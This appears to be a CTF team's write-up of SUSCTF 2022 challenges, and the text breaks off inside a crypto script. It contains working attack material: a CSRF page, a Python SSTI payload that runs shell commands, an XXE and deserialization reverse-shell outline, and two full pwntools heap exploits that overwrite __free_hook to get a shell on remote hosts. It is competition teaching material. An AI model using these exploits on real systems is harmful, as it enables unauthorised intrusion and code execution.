SUSCTF

Retr_0 2022-03-01 11:22:00
CTF

0x00 Web

rubbish maker

直接通过index.txt中的解混淆函数去替换index.txt中的对应调用。然乎通过goto去把代码重新排序。结合本地去给index.php加一些echo和var_dump来运行调试。可以大概分析到程序逻辑,

最终payload:

function lMxvOnYC($FpuomFef){
    //将index.txt中第一个函数复制到这里
}
$GLOBALS['code'] ='···';//index.txt中除了第一个函数之外的base64
$GLOBALS['transcode'] ='···';//index.txt中第一个函数的base64

$GLOBALS['key'] ="iZnlAZzX";
$transfrom ="lMxvOnYC";

$array=[];
$bb = preg_match_all("/".$transfrom."\('[\w\W]+[^\\\\]{1}'\)/U",base64_decode($GLOBALS['code']),$array);
$map =[];
$func =[];
$funccode=[];
//var_dump($array);
//var_dump($array[0][0]);
//eval('var_dump('.$array[0][0].');');

function find_in_tranfcode($str){
    $array=[];
    preg_match_all("/".$str."' === \(\\$........ \^ \\$........\)\) {\n        goto ........;/U",base64_decode($GLOBALS['transcode']),$array);
    if($array[0][0]!==null) {
        $goto = substr($array[0][0], 54, -1);
        preg_match_all("/".$goto.":\n    return ([^}])+};/",base64_decode($GLOBALS['transcode']),$array);
        return substr($array[0][0],21,-1);
    }else{
        preg_match_all("/".$str."' !== \(\\$........ \^ \\$........\)\) {\n        goto ........;
    }
    goto ........;/U",base64_decode($GLOBALS['transcode']),$array);
        if($array[0][0]!==null){
            $goto = substr($array[0][0], 79, -1);
            preg_match_all("/".$goto.":\n    return ([^}])+};/",base64_decode($GLOBALS['transcode']),$array);
            return substr($array[0][0],21,-1);
        }else{
            echo "

            not found

            ";
        }
    }

}

for ($i=0;$i<295;$i++){
//    if(sizeof($array[0][$i])!==20||sizeof($array[0][$i])!==21){
//        continue;
//        echo $i;
//    }
    try {
        eval('$map[$array[0]['.$i.']]='.$array[0][$i].';');
    }catch (Exception $e){
        echo $e;
    }

}
// var_dump(base64_encode($array[0][0]));
$code=$GLOBALS['code'];
$num=0;
$expc=[];
//echo sizeof($array);
for ($i=0;$i<295;$i++){
    if(is_string($map[$array[0][$i]])){
        $code = base64_encode(str_replace($array[0][$i],$map[$array[0][$i]], base64_decode($code)));
    }else if($map[$array[0][$i]]!==null){
        $code = base64_encode(str_replace($array[0][$i],"function_".$i, base64_decode($code),$num));
        // var_dump(substr($array[0][$i],9,-1));
        if($num!==0){
            eval('$func["function_".$i]='.substr($array[0][$i],9,-1).'^"'.$GLOBALS['key'].'";');
        }
        // $func["function_".$i]=substr($array[0][$i],9,-1)^"MCKePhvU";
    }else{
        $code = base64_encode(str_replace($array[0][$i],"null_".$i, base64_decode($code),$num));
    }
}


//var_dump($code);
var_dump($func);


foreach ($func as $key=>$str) {
    $funccode[$key]=find_in_tranfcode($func[$key]);
}

//var_dump($funccode);


//replace Func
foreach ($funccode as $key=>$value){
    if(strstr($value,' == ')!==false){
        $code = base64_encode(str_replace($key,"func_if_equal", base64_decode($code),$num));
    }elseif (strstr($value,' !== ')!==false){
        $code = base64_encode(str_replace($key,"func_if_not_equal", base64_decode($code),$num));
    }elseif (strstr($value,' + ')!==false){
        $code = base64_encode(str_replace($key,"func_add", base64_decode($code),$num));
    }elseif (strstr($value,' % ')!==false){
        $code = base64_encode(str_replace($key,"func_percent", base64_decode($code),$num));
    }elseif (strstr($value,' > ')!==false){
        $code = base64_encode(str_replace($key,"func_dayv", base64_decode($code),$num));
    }elseif (strstr($value,' - ')!==false){
        $code = base64_encode(str_replace($key,"func_minus", base64_decode($code),$num));
    }elseif (strstr($value,' ?? ')!==false){
        $code = base64_encode(str_replace($key,"func_double_wenhao", base64_decode($code),$num));
    }elseif (strstr($value,' * ')!==false){
        $code = base64_encode(str_replace($key,"func_cheng", base64_decode($code),$num));
    }elseif ($value===NULL){
        echo $key;
        echo base64_encode($array[0][13]);
        $code = base64_encode(str_replace($key,"NULL_func", base64_decode($code),$num));
    }
}

var_dump($code);


//release goto
$goto_name=[];
$goto_block=[];

preg_match_all("/[a-zA-Z]{8}:/",base64_decode($code),$goto_name);
//var_dump($goto_block);
function get_goto_block($name,$code){
    $end='';
    $part_code=strstr(base64_decode($code),$name);
//    var_dump($part_code);
    preg_match("/[a-zA-Z]{8}:/",substr($part_code,8),$end);
//    var_dump($end);
    if(sizeof($end)===0){
        return $part_code;
    }
    $part_code=explode($end[0],$part_code);
//    var_dump($part_code[0]);
    return $part_code[0];
}

foreach ($goto_name[0] as $value){
//    var_dump($value);
    $goto_block[$value]=get_goto_block($value,$code);
}
$bad_key=null;
foreach ($goto_block as $key=>$value){
    if($bad_key!==null){
        $goto_block[$bad_key].=$value;
        $bad_key=null;
    }
    if(strlen($value)==10){
        $bad_key=$key;
    }
}
var_dump($goto_block);

// renew code without goto
function get_next_goto($code){
    $match=[];
    preg_match_all("/goto [a-zA-Z]{8};/",$code,$match);
    foreach ($match[0] as $value){
        if(strstr($code,substr($value,5,-1).':')===false){
            return substr($value,5,-1);
        }else{

        }
    }
    echo "has a xunhuan";
    return false;
}
$no_goto_code='';
$xunhuan_list=[];
$first_goto="goto GAjzJxOm;";
$no_goto_code=$first_goto;
$next_goto='GAjzJxOm';

//var_dump(get_next_goto($first_goto));

while ($next_goto){
    $no_goto_code=str_replace('goto '.$next_goto.';','goto '.$next_goto.';
'.$goto_block[$next_goto.':'],$no_goto_code);
    $next_goto = get_next_goto($no_goto_code);
    echo $next_goto.'
    ';
}
$code=base64_encode($no_goto_code);
var_dump($code);

//var_dump($goto_block);
//var_dump(get_goto_block("raxZOkQy:",$code));

fxxkcors

CSRF 创建一个恶意html 让bot访问给我们权限即可。

<!DOCTYPE html>
<html>
<head>
   <title>Evil page</title>
</head>
<body>

<script>
function go(){
let w = window.open("http://124.71.205.122:10002/change.php",'');
setTimeout(function(){w.close();csrf.submit()},1000)
}
</script>
<img onerror=go() src='xxx'>
<form style="display:none" name="csrf" 
method="post" action="http://124.71.205.122:10002/changeapi.php" enctype="text/plain">
    <input type="hidden" name='{"username":"' value='Retr_0"}' />
</form>
</body>
</html>

注册一个=Retr_0的用户名就有flag

gadget2/revenge

xxe 用ftp 读hint.txt

之后有源码zip

能看出来post他那个接口 之后有反序列化

打CC6 第一个不出网弹不了shell,用revenge的弹shell 之后得到flag路径
revenge直接 cat

v2.0就
curl -d -F 读flag

HTML practice

判断为python写的
测试发现$,<,/,,%,>都被ban了, 发现%while可以用
eval和exec也被ban了
搜索得到一个叫unicode欺骗的东西(HCTF2018)
https://unicode-table.com/en/1D49/
将eval变成ₑval
经过搜索与幸运的尝试self.context.writer()可以使用
故SSTI

%while self.context.writer()(val(name))==0:
%endwhile

再利用python的str函数达到命令执行

?name=str(__import__(%27os%27).popen(%27ls/%27).read())
?name=str(__import__(%27os%27).popen(%27cat%20/flag%27).read())

0x01 Re

DigitalCircuits

使用pyinstxtractor和Uncompale反编译python封装程序

发现TEA加密

直接脚本解密

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#!/usr/bin/env python
import binascii
def decrypt(v, k):
    v0 = v[0]
    v1 = v[1]
    x = 0xC6EF3720
    delta = 0x9E3779B9
    k0 = k[0]
    k1 = k[1]
    k2 = k[2]
    k3 = k[3]
    for i in range(32):
        v1 -= ((v0 << 4) + k2) ^ (v0 + x) ^ ((v0 >> 5) + k3)
        v1 = v1 & 0xFFFFFFFF
        v0 -= ((v1 << 4) + k0) ^ (v1 + x) ^ ((v1 >> 5) + k1)
        v0 = v0 & 0xFFFFFFFF
        x -= delta
        x = x & 0xFFFFFFFF
    v[0] = v0
    v[1] = v1
    return v
if __name__ == '__main__':
    # plain = [1, 2]
    key = [0b0100010001000101, 0b0100000101000100, 0b0100001001000101, 0b0100010101000110]
    # encrypted = encrypt(plain, key)
    # print (encrypted)
    encrypted = [0x3e8947cb,0xcc944639,0x31358388,0x3b0b6893,0xda627361,0x3b2e6427]
    for i in range(0,6,2):
        encrypted1=[]
        encrypted1.append(encrypted[i])
        encrypted1.append(encrypted[i+1])
        # print(encrypted1)
        decrypted = decrypt(encrypted1, key)
        # print(decrypted)
        print(str(binascii.unhexlify(hex(decrypted[0])[2:]),'utf-8'),end="")
        print(str(binascii.unhexlify(hex(decrypted[1])[2:]),'utf-8'),end="")

得到flag

hell_world

在case3读入并且得知flag未=为44位

在case8进行校验
对a1+376 == 44 进行校验

向下找到对a1+376进行操作的位置

实际调试发现是将输入转化为2和3的编码进行比较,找到生成正确23编码的源头

向上找到异或数组

发现能够直接进行异或,得出结果
```cpp=

include <stdio.h>

int main()
{
unsigned char enc[44] = {5, 143, 158, 121, 42, 192, 104, 129, 45, 252, 207, 164, 181, 85, 95, 228, 157, 35, 214, 29, 241, 231, 151, 145, 6, 36, 66, 113, 60, 88, 92, 48, 25, 198, 245, 188, 75, 66, 93, 218, 88, 155, 36, 64};
unsigned char xor_byte[44] = {86, 218, 205, 58, 126, 134, 19, 181, 29, 157, 252, 151, 140, 49, 107, 201, 251, 26, 226, 45, 220, 211, 241, 244, 54, 9, 32, 66, 4, 106, 113, 83, 120, 164, 151, 143, 122, 114, 57, 232, 61, 250, 64, 61};

for (int i = 0; i < 44; i++)
{
    printf("%c", xor_byte[i] ^ enc[i]);
}
return 0;

}

## 0x02 Pwn
### rain

`realloc`对应size为0时相当于free,free时指针未置0
`rain`可以将+0x48处指针置0,再次`realloc`相当于`malloc`

多次`free`拿到`heap``libc`基址,清掉指针
再次申请,利用原地double free,再申请,修改tcache fd指向`__free_hook-0x10`
两次清掉指针再申请即可拿到`__free_hook-0x10`指针,写入`/bin/sh\x00+p64(0)+p64(libc.sym['system'])`
最后free,即可getshell

```python
from pwn import*
context(os='linux', arch='amd64', log_level='debug')
# r = process('./rain')
# r = process(["./rain"], env={"LD_PRELOAD":"./2.27-3ubuntu1.2_amd64/libc.so.6"})
r = remote('124.71.185.75', 9999)
libc = ELF('./libc.so.6')
elf = ELF('./rain')
def config(frame):
    r.sendlineafter("ch> ", str(1), timeout = 600)
    r.sendafter("FRAME> ", frame, timeout = 600)

def show():
    r.sendlineafter("ch> ", str(2), timeout = 600)

def free():
    f = ''
    f+= p8(0x50)+p8(0)+p8(0)+p8(0) #0 1 2 3
    f+= p8(0x50)+p8(0)+p8(0)+p8(0) #4 5 6 7
    f+= p8(2) #8
    f+= p8(1) #9
    f+= p8(0x64)+p8(0)+p8(0)+p8(0) #10 11 12 13
    config(f.ljust(0x12, "\x00"))


f = ''
f+= p32(1) #0 1 2 3
f+= p32(1) #4 5 6 7
f+= p8(2) #8
f+= p8(1) #9
f+= p32(0x64) #10 11 12 13
f = f.ljust(0x12, "\x00")
config(f.ljust((0x1d8+0x12), "\x00"))
config(f.ljust((0x1e8+0x12), "\x00"))
free()
free()
show()
r.recvuntil("Table:            ")
heap_base = u64(r.recv(3)+"\x00"*5)-0x9160

f = ''
f+= p32(0x50) #0 1 2 3
f+= p32(0x50) #4 5 6 7
f+= p8(2) #8
f+= p8(1) #9
f+= p32(0) #10 11 12 13
f = f.ljust(0x12, "\x00")
for i in range(4):
    config(f.ljust((0x18+0x12), "\x00"))
    config(f.ljust((0x38+0x12), "\x00"))

f = ''
f+= p32(0x50) #0 1 2 3
f+= p32(0x50) #4 5 6 7
f+= p8(2) #8
f+= p8(1) #9
f+= p32(0) #10 11 12 13
f = f.ljust(0x12, "\x00")
for i in range(7):
    config(f.ljust((0xb8+0x12), "\x00"))
    config(f.ljust((0xe8+0x12), "\x00"))

config(f.ljust((0xb8+0x12), "\x00"))
free()
show()
libc.address = u64(r.recvuntil("\x7f")[-6:]+"\x00"*2)-96-0x10-libc.sym['__malloc_hook']

print hex(heap_base)
print hex(libc.address)
r.recv()
r.sendline('3')


f = ''
f+= p32(0x50) #0 1 2 3
f+= p32(0x50) #4 5 6 7
f+= p8(2) #8
f+= p8(1) #9
f+= p32(0) #10 11 12 13
f = f.ljust(0x12, "\x00")
config(f.ljust((0x68+0x12), "\x00"))
free()
free()

f = ''
f+= p32(0x50) #0 1 2 3
f+= p32(0x50) #4 5 6 7
f+= p8(2) #8
f+= p8(1) #9
f+= p32(0) #10 11 12 13
f = f.ljust(0x12, "\x00")
f+= p64(libc.sym['__free_hook']-0x10)
config(f.ljust((0x68+0x12), "\x00"))


r.recv()
r.sendline('3')
f = ''
f+= p32(0x50) #0 1 2 3
f+= p32(0x50) #4 5 6 7
f+= p8(2) #8
f+= p8(1) #9
f+= p32(0) #10 11 12 13
f = f.ljust(0x12, "\x00")
config(f.ljust((0x68+0x12), "\x00"))
r.recv()
r.sendline('3')

f = ''
f+= p32(0x50)*2
f+= p8(2) #8
f+= p8(1) #9
f+= p32(0) #10 11 12 13
f = f.ljust(0x12, "\x00")
f+= "/bin/sh\x00"+p64(0)+p64(libc.sym['system'])

config(f.ljust((0x68+0x12), "\x00"))

free()
r.sendline("cat flag")

r.interactive()

Happytree

问题应该是在申请的时候左右孩子没有置0
所以可以控制节点,在堆上伪造chunk造成重叠,然后修改tcache的fd,改写__free_hooksystem

from pwn import*
context(os='linux', arch='amd64', log_level='debug')
r = remote('124.71.147.225',9999)
# r = process('./happytree')
# r = process(["/lib64/ld-linux-x86-64.so.2", "./happytree"], env={"LD_PRELOAD":"./libc.so.6"})
elf = ELF('./happytree')
libc = ELF('./libc.so.6')
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

def insert(sz, ct):
    r.sendlineafter('cmd> ', str(1))
    r.sendlineafter('data: ', str(sz))
    r.sendafter('content: ', ct)

def delete(sz):
    r.sendlineafter('cmd> ', str(2))
    r.sendlineafter('data: ', str(sz))

def show(sz):
    r.sendlineafter('cmd> ', str(3))
    r.sendlineafter('data: ', str(sz))

insert(0xc9, '0'*0xc9) #0
insert(0xcb, '1'*0xc9) #0
delete(0xcb)
delete(0xc9)
insert(0xc9, '0') #0
show(0xc9)
r.recvuntil('content: ')
heap_base = u64(r.recv(6)+'\x00\x00')-0x11f30

delete(0xc9)
insert(0xc9, 'A'*0x60+p64(0)+p64(heap_base+0x127f0)+p64(0)) #0
insert(0xcb, 'B'*0xc9) #1
insert(0xcd, 'C'*0xc9) #2
insert(0xcf, 'D'*0xc9) #3
insert(0xd0, 'E'*0xc9) #4
insert(0xd2, 'F'*0xc9) #5
insert(0xd4, 'G'*0xc9) #6
insert(0xd6, 'H'*0xc9) #7

delete(0xd6)
delete(0xd4)
delete(0xd2)
delete(0xd0)
delete(0xcf)
delete(0xcd)
delete(0xcb)
delete(0xc9)

insert(0x40, '\xa0')
show(0x40)
libc.address = u64(r.recvuntil('\x7f')[-6:]+'\x00\x00')-352-0x10-libc.sym['__malloc_hook']

delete(0x40)

insert(0xc9, 'a'*0xc9) #0
insert(0xcb, 'b'*0xc9) #1
insert(0xcd, 'c'*0xc9) #2
insert(0xcf, 'd'*0xc9) #3
insert(0xd0, 'e'*(0xa0-0x20)+p64(0) \
+p64(0x31)+p64(0xd0)+p64(heap_base+0x124b0)+p64(0)*3+p64(0x51)) #4
insert(0xd2, 'f'*0xc9) #5
insert(0xd4, 'g'*0xc9) #6
insert(0xd6, '/bin/sh\x00'.ljust(0xa0, 'A')+p64(0)+p64(0xa1)) #7
insert(0xd8, p64(0)*3+p64(0x61)\
    +p64(0xe0)+p64(heap_base+0x127a0)\
    +p64(0)*9+p64(0x21)+p64(0)*3+p64(0x21)) #7

delete(0xc9)
delete(0xcb)
delete(0xcd)
delete(0xcf)
delete(0xd0)
delete(0xd2)
delete(0xd4)
delete(0xd6)

delete(0xe0)
delete(0xd8)

one = [0x4f365, 0x4f3c2, 0x10a45c]
insert(0x90, '/bin/sh\x00'.ljust(0x20,'A')+p64(0)+p64(0xe1)+p64(0)*3+\
    p64(0x41)+p64(libc.sym['__free_hook']))


insert(0x58, '/bin/sh\x00')
insert(0x57, p64(libc.sym['system']))
insert(0x56, '/bin/sh\x00')

log.success("libc_base ==> "+hex(libc.sym['__malloc_hook']))
log.success("heap_base ==> "+hex(heap_base))

delete(0x56)

r.interactive()

kqueue

删除umount 重写 重新启动的时候利用 root执行 /bin/sh即可

kqueue revenge

这里直接flag再附件里

0x03 Misc

Tanner

就是一个计算公式。。。 把c0-c9的方程写出来
f0-f4只能是0.吧所有满足的数字加和后二进制再哈希

AUDIO

利用AU处理 将莫斯声放大到能听清为止。直接手动解决下就可以了

misound

利用AU查看频谱得到一些字母。silenteye得到一些字母。 SSTV也有一串。
然后想怎么计算flag
发现 S也就是flag第一位 * 频谱图字母第一位 和 silenteye得到的第一位*26比较相同
比较了下下一位 发现也很相同。得到结果错了几个字母。手动改一下就可以了。

ra2

通过里面的内容可以知道就是需要找到flag这个建筑的位置。可以看到地图信息里有坐标。利用arcmap查看shp的素材就可以看地图了。然后就能找到flag位置。一个动图。

checkin

discord >help >flag 再 私聊>flag瞬间截图。

0x04 Crypto

large case

$e$可以直接枚举
把$c$乘$2^{-(1024 + 8\times k)}$就能换到两个素数乘积上,$p-1, q-1$的因子比较小,就换到$p, q$然后在$p$和$q$上跑AMM,最后CRT一下就出了

import random
import time
from Crypto.Util.number import *
from tqdm import tqdm


# About 3 seconds to run
def AMM(o, r, q):
    if r == 3:
        return(AMM3(o, r, q))
    start = time.time()
    print('\n----------------------------------------------------------------------------------')
    print('Start to run Adleman-Manders-Miller Root Extraction Method')
    print('Try to find one {:#x}th root of {} modulo {}'.format(r, o, q))
    g = GF(q)
    o = g(o)
    p = g(random.randint(1, q))
    while p ^ ((q-1) // r) == 1:
        p = g(random.randint(1, q))
    print('[+] Find p:{}'.format(p))
    t = 0
    s = q - 1
    while s % r == 0:
        t += 1
        s = s // r
    print('[+] Find s:{}, t:{}'.format(s, t))
    k = 1
    while (k * s + 1) % r != 0:
        k += 1
    alp = (k * s + 1) // r
    print('[+] Find alp:{}'.format(alp))
    a = p ^ (r**(t-1) * s)
    b = o ^ (r*alp - 1)
    c = p ^ s
    h = 1
    for i in range(1, t):
        d = b ^ (r^(t-1-i))
        if d == 1:
            j = 0
        else:
            print('[+] Calculating DLP...')
            j = - discrete_log(d, a)
            print('[+] Finish DLP...')
        b = b * (c^r)^j
        h = h * c^j
        c = c^r
    result = o^alp * h

    assert result^r == o
    end = time.time()
    print("Finished in {} seconds.".format(end - start))
    print('Find one solution: {}'.format(result))
    return result


def AMM3(o, r, q):
    start = time.time()
    print('\n----------------------------------------------------------------------------------')
    print('Start to run Adleman-Manders-Miller Root Extraction Method')
    print('Try to find one {:#x}th root of {} modulo {}'.format(r, o, q))
    g = GF(q)
    o = g(o)
    p = g(random.randint(1, q))
    while p ^ ((q-1) // 3) == 1:
        p = g(random.randint(1, q))
    print('[+] Find p:{}'.format(p))
    t = 0
    s = q - 1
    while s % r == 0:
        t += 1
        s = s // 3
    print('[+] Find s:{}, t:{}'.format(s, t))

    a = p ^ s
    apie = p ^ (pow(3, t - 1, q) * s)
    b = o ^ s
    h = 1

    for i in range(1, t):
        d = b ^ (3^(t-1-i))
        if d == 1:
            j = 0
        elif d == apie:
            j = 2
        else:
            j = 1

        b = b * (a^3)^j
        h = h * a^j
        a = a^3
    l = (s + 1) // 3
    result = o^l * h
    if s % 3 == 1:
        result = result^(-1)
    end = time.time()
    print("Finished in {} seconds.".format(end - start))
    print('Find one solution: {}'.format(result))
    return result


def findAllPRoot(p, e):
    print("Start to find all the Primitive {:#x}th root of 1 modulo {}.".format(e, p))
    start = time.time()
    proot = set()
    while len(proot) < e:
        assert pow(pow(random.randint(2, p-1), (p-1)//e, p), e, p) == 1
        proot.add(pow(random.randint(2, p-1), (p-1)//e, p))
    end = time.time()
    print("Finished in {} seconds.".format(end - start))
    return proot


def findAllSolutions(mp, proot, e, cp, p):
    print("Start to find all the {:#x}th root of {} modulo {}.".format(e, cp, p))
    start = time.time()
    all_mp = set()
    for root in proot:
        mp2 = (mp * root) % p
        assert(pow(mp2, e, p) == cp)
        all_mp.add(mp2)
    end = time.time()
    print("Finished in {} seconds.".format(end - start))
    return all_mp


p = 127846753573603084140032502367311687577517286192893830888210505400863747960458410091624928485398237221748639465569360357083610343901195273740653100259873512668015324620239720302434418836556626441491996755736644886234427063508445212117628827393696641594389475794455769831224080974098671804484986257952189021223
q = 145855456487495382044171198958191111759614682359121667762539436558951453420409098978730659224765186993202647878416602503196995715156477020462357271957894750950465766809623184979464111968346235929375202282811814079958258215558862385475337911665725569669510022344713444067774094112542265293776098223712339100693
es = [108281733, 210254331, 243755169, 11709895983, 22737504081, 26360380419, 26436211671, 51332093097, 59511083403, 2402158058783, 4664352163681, 5407545920819, 259776235785533, 504416369700931, 584787466008569, 586469731780021, 1138768263961547, 1315090665606477, 1320213711239953, 2553556361177139, 2960426828828361, 1446314880565794729, 2951342803295903933, 3046542174379651381, 5244373062415575681, 5730722897265089731, 5915574760310485067, 6643826653516219769, 6858131856658956433, 10183177893473575167, 11805712807793316333, 29174409689369287927, 56648945501807377289, 65675095579671303211, 156408623512615229979, 203513631527229102723, 319166643156428468183, 329461775143628013631, 353107447269563313123, 619736747604238989481, 639727156222148170817, 718482396673111195019, 720549264404671403071, 741657973641547145683, 743791510859260601447, 1399115061632291192897, 1444245323624374139929, 1622042821551317083603, 1674363906147165220571, 22008545580873204394473, 32085531415431778866379, 49686399468576362364801, 116342920140981269432531, 225907012781448949363117, 261901868165689527303383, 3469821040211693800264129, 4514814239677226157841273, 7833453312710415726091673, 17565614681839486963466001, 35844304150722227767998277, 37000508441281960784638589, 69600106874634387004039739, 71845148146840164140542723, 80689828042802917659665761, 83292582583533373331870777, 488244911347951457355120523, 1102259647944054214821533651, 1372907974903398422730619063, 2471690004676366077508961787, 2665822200942044629057437641, 3090580527040748795616666859, 39420970608751091035136363329, 40692544891912304963691843353, 70048886264223851005605479253, 142941401718783995602556501081, 147552161109479279411611772017, 148470191000267515143868375813, 277554190886335178334488412967, 286507059521090077594625371919, 288289629444732540599497184891, 321778240592613006319324578533, 332157613025609308035138743581, 334224208424263834040259544609, 335185675587129700635232568381, 389681451306821125293184254851, 650841448772850610151308704067, 754543160101805670244126237433, 4263096392974939416228318148579, 4400608069025373551073532202603, 5546997403343202817428989990923, 5725922963468489390241246025811, 9624348395765087797006863561323, 9856707843933099425344839579111, 9934794174325447026135622898611, 54832794960408730518817977936737, 599868147761543504684820774732673, 619217669049378066916089034505561, 1354259794616219087855163413498201, 1397943192081092623988898494015857, 1553987842514296651992020486908303, 2306482138968943482837259107578493, 4478574969726096291428563445115651, 5192167949323976043220925299233849, 16674081698823112227103433084551247, 32376632655347296193048114505108529, 37535357902116646230842682504951971, 218664492379093188684991702836191461, 478770971246976986605455916130679401, 494214346819942370194579413571424257, 18337878225039451455456773066205502019, 51167768598266698537756035128890481543, 66493594083490535814037606927859972491, 67368745449244076658709735025640507587, 69541811278908761091524863075822173259, 99354199986726962161148394320927307001, 115184784510452859201494080479970117499, 129112877606141201604263365949805806837, 149685055957117306824515723709889999663, 1909262722594312006386077682702695869453, 1970848455780453992853937042891277654021, 1983110545193552107397253887302509289769, 2580356630654263050806094629170605249953, 4477061983798917505339375024306457564353, 268655875311694898897921059259721830466511, 277321717293543040901561410542520091313527, 279047138486468161351459090611735453459203, 629975640255447936261087960178937767452811, 30807591889483392862467635081113066058436609, 62865815619856530416821659372816382999784693, 64893633636453475730736119260056515334038701, 122068696535566946631432183836043593737639051, 126006179882544203022597162279988607623684307, 141518491496076889788104924616244287890010449, 146083353081149906765742115012503825043137193, 222715058326390594783693727646022621707566011, 4334993014512067266241653593507830147669982283, 31338646186141120671376964978872544541087859657, 683445887673596081725269505851105961795710546259, 888152340388328004795786144873791103598988591783, 96168930031607204256726923869575539939293443626833, 124973552143172976767156385477660225012812703210221, 29243969733682697637869290859066007973156798737283423, 56784012610323698440673165205227540930073114701712161, 65831683582906000914251435126752080663985890766132339, 839696245071216864612080607384272932227087588894197209, 866781731156700717324546343024028321894549844065366513, 118155205695850894493864777469528359480677868695184974483, 121966454345094320231418382700928840976382500350900792731, 390610562103222033974506216542750990075147280485271838771762699, 54963531852359074460934241162612075634897419649515466832101325113, 25406976670004014948758933236867995672593596052426680353315343084713278344953610243021354093888376700328578783688724808149304956414842621035895628049848011954681403740536563587458414968130181375745372588025244451571689351394571703822008628735138994568974677316701, 49333592421210158599560913824599990152097598704734552080332525637651797327948274966020374126489200461942854316390249745823106301096851615370699342810163819646399091724985716271460385930880858787751420083394734578884763906736601552347029459816034025749406911830307, 57194151962601908989702446962245010576846980035653828422115862921285776609413958695579809733601171027843219658738372417856725721996318596036948299318887356358873439067804005389719540423579127379180990723172678050499703892480961782794441045903763489448866731991193, 563636839439592402294917761237758571999373866025717619184732009438974271230565874167933393003517711512322634596945234052253564254759006985933987244533844913206637154381309972145373297124655987033327260616948031328483547134454310201488713422736568501849657233152800551, 1094432858802933228425525832589534381530850495532066214867456859587546689188980514604517986413411919447894261106240097111255064552299588519255384454014944229642266250524324791671501021619304598300406753603389923476172564095013681037783950546378837505233426067680807257, 1268814131855681616330555650892764062973632354104289747659025675000110763562109064355641025733452911805349932649338299841872888992006997174015673388189970075917367996759853323567334857936820554822210825199770414098302264385428483176772811642677723837763475871403289243, 339359995540658644241007176531370773813996369855682253530444155697061052726645525409967321161747267763946288479827215381968412837490801195576631132437590628266192916438762724746229895112398217680004835842585943119245658224691282019924832755152420242888122619498790513180513, 692496284193413120035837647146969979719644074911195955170620181274935754583144695321819963426066992659185281575341988746826363141539526706609807192914375556251598502558054842278733521690237628847393257672632518264265736699066297007588579704693080134102249220397295403910101, 714833645566488172760610920553050750738073438553481401449793484799878434770731733593716836239749671906199550723087258912836582381331979286400924232437402608535829471881146367534938425104208158602331499643108272064467053850643929878003796818555330812811705820209152794454157, 1344643633964298947448114268040946775048727124902659158256219791652765145048604567412012939547173515432551420124298859717857538865650141541000994963621426089130220245329335553990677560824177997634513020639131875886198401311921490968175017563215589871701247110903783737544107, 1388016849756856835521783459562619261048226731390897112653052562750885314922391748451395391012306044955038550129071889506443740985502533412243076330084360441805597211308519979257614926577494762405355153465159894545467879415155956136300477528793148023696771053681618679622899, 1558892198238436429172710892398370048662671607775498292447267593338966973520427122824343184205361571013658118241514223823687402206809326302061373263819662142307764870286898625744390650688690389447826982354014283871885217333845288284118508967596887659884760266979297314377393, 1609176277977980138974723571173860499736700425260232716710871776521098891601551943907283278849679158655414423725839398950562025154732230375931983726506984837088744742140113150315160076130939854012958201264928928893040025562721755535968055444297488276511281153796879615502601, 47751970207570499258915820242397118449576211540995456813906015972285194426260840013058403726061060940250185201333192652765028525530799682410570568255153384573449129991349803917556772151572939382024706555318643846472498952166014972993897704668080932007361602303354774596410731, 7528475261072484916723916873230773036547633467668407006403883298035501414038813217536518375092588637164639112399313555105381259857841763989737177252372989694333312389249658540011946069805146193752453946610540757471718763942626297424019131451219674808311074898501001674567560563, 1059345624408146479059541528197418474724881868895956879111962360334498848216979228463025314393513929585490191901442656873156981153217103754490234343028407734505586649438101166708385285667877944897296765125373901304761407587834931499220957979591596755961978906031723437904974460081, 322135968108610723705369622882782332242423434514438800877723780862064525976202163758190895343110387166987598956324574054166387521285150907144132986499344962564195479732198806113192323453070262175854574294664102480269928111914354141056442557387879498054818851493964797426979167923711, 625502387052793872924977393619491578364842655801931429366650664410256346635664834268314420777294817704348737232145347513220088294805529795276113669620080859272495806326977784316842825575768147982808031633686521591823751422491969714087434887503303178312926880723749766921074548213377, 725166703300666764467231777988433880957243944827032486154492083529467562347141677212014115332095630659554492025936823226003807533911126603057058973027542417880716247043794494180467428728775566655824943960020515171395672920542694926937150092664981318686389516967716906385900493823123, 9249645834218897668951948544899752024077200137667808695857469528381986157572981583087476653532809318384957202955513144244161989845728044707689556952303767638925799018095048523239149176063031875430417602781773270278132634337681410660544247231485471593774730143806191302608153528454713, 9548005098070484172811082359340981067013403602893579823556712483840133166674858565653348687173582744709681725394281880632064521967038379516010703693758007850849952657154704992179398286327267173194155495115111917784535834537493231910935197315260888369949161551480259568671560470997841, 1301534706831055288853171354033715248441226841360388497860847655297254941901979463162771941407018751406528741498296226435565392533151484221986710135161079857695712615720020116296172021844529182084010330345731546990446814351388984216018061449350309883869485311246710650960384772067006131, 1343517388543127228165971342394128397727816580628520017335217664331339607794045132379185030717429005886993984511343143537493131432463437915532540258235476376960807581297110297966246961622375576106920765567794144065006100523945340535436950641313768030990237959543442077834777008289479867, 4302757550444376232875852369861221786569640597052767358213181836684862073358531306355126192042405690007729306200109743921969899400285115759669006519359646900424067089293276040916794689561218011199080834106938288709501402731009001331088923956032378426608279247865508173386408044594368467705643, 605448942300572786062865482761098881810971597872508580814707424685800287849623550042807567107366863251676423035872821179385526154657514948429210317742203085711921604672299571632645329255775976736758990264004439809129525914731135505105013976920565326282658996138123476930429586149012247721158041]
n = 3094822687440851047614939396401973115026642334105659170846367264751090139004472347624890092266410158638428735172508723023428269969359498983926136713021325176403547659700063138756228187448027776416225406803246863161310767283030558013531427777522406827071820828858816733381479204207037916294884077802760772064129013958002304165692690846718396934886835581199916757466437993883772110404556790032091447246567853674312199484073929019059539960634130860821444199182318813599404568277081546429864286845543474482186422783337170254812753566292884279364725874464841284839523101292260485948181851419372018630191413487544090390569241554687344929470966816975069378342891949688784943776757193672523333822356696251333202634214314719974036423097437650759692052618463493661241936049855010728499732858413958382035388764322369175672005417188147997974674639659256989496314567458982088172614446060434494767158607398742868339797458056998131556423873


for e in es:
    try :
